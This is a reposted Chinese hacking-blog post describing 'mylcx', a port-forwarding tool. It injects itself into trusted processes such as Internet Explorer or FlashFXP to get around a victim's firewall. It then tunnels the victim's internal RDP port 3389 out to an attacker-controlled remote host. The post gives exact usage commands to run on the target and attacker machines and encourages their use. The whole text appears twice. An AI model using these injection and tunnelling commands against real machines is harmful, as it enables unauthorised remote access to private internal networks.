web安全系列 mylcx穿墙
转自:第零空间
ps:如果是防火墙或者是策略的话,你注入到IE或者flashfxp里,应该也是回不来的。思路很好.如果能注入IIS进程里,利用80端口出来,不知道可以不可以。
说一下用法吧
-slave 和-listen 两个参数同lcx就不多说了
简单说下第三个参数把
mylcx -inject port1 remoteip remoteport [-path exepath]
port1是被映射的端口
remoteip 是映射的远程机器
remoteport是远程端口
我发现我现在说话越来越说不清楚了,呵呵,还是看个例子吧。
比如我们想连对方的3389端口,而对方又是内网没法直接连,并且对方防火墙普通的lcx没法转发,那就在对方机器上运行
mylcx -inject 3389 56.78.90.12 5000
然后在自己的机器上运行
mylcx -listen 5000 5001
最后打开mstsc,输入127.0.0.1:5001既可连接对方3389端口。
默认的mylcx 会插入到C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE中去运行,我们也可以指定他插入到别的程序里面运行,只要这个程序能允许访问网络,比如说d:\tools \flashfxp.exe,那我们可以在对方机器上运行
mylcx -inject 3389 56.78.90.12 5000 -path “d:\tools\flashfxp.exe”
就可以了,尽情发挥吧。需要注意一点的是,不是所有程序都可以用来插入的,有些程序可能会插入失败或者插入后运行失败,都是有可能的。
http://www.zeroplace.cn/article.asp?id=441
http://www.zeroplace.cn/article.asp?id=454
http://www.hackline.net/a/soft/tools/2010/0731/5116.html
转自:第零空间
ps:如果是防火墙或者是策略的话,你注入到IE或者flashfxp里,应该也是回不来的。思路很好.如果能注入IIS进程里,利用80端口出来,不知道可以不可以。
说一下用法吧
-slave 和-listen 两个参数同lcx就不多说了
简单说下第三个参数把
mylcx -inject port1 remoteip remoteport [-path exepath]
port1是被映射的端口
remoteip 是映射的远程机器
remoteport是远程端口
我发现我现在说话越来越说不清楚了,呵呵,还是看个例子吧。
比如我们想连对方的3389端口,而对方又是内网没法直接连,并且对方防火墙普通的lcx没法转发,那就在对方机器上运行
mylcx -inject 3389 56.78.90.12 5000
然后在自己的机器上运行
mylcx -listen 5000 5001
最后打开mstsc,输入127.0.0.1:5001既可连接对方3389端口。
默认的mylcx 会插入到C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE中去运行,我们也可以指定他插入到别的程序里面运行,只要这个程序能允许访问网络,比如说d:\tools \flashfxp.exe,那我们可以在对方机器上运行
mylcx -inject 3389 56.78.90.12 5000 -path “d:\tools\flashfxp.exe”
就可以了,尽情发挥吧。需要注意一点的是,不是所有程序都可以用来插入的,有些程序可能会插入失败或者插入后运行失败,都是有可能的。
http://www.zeroplace.cn/article.asp?id=441
http://www.zeroplace.cn/article.asp?id=454
http://www.hackline.net/a/soft/tools/2010/0731/5116.html
转载于:https://blog.51cto.com/obnus/372462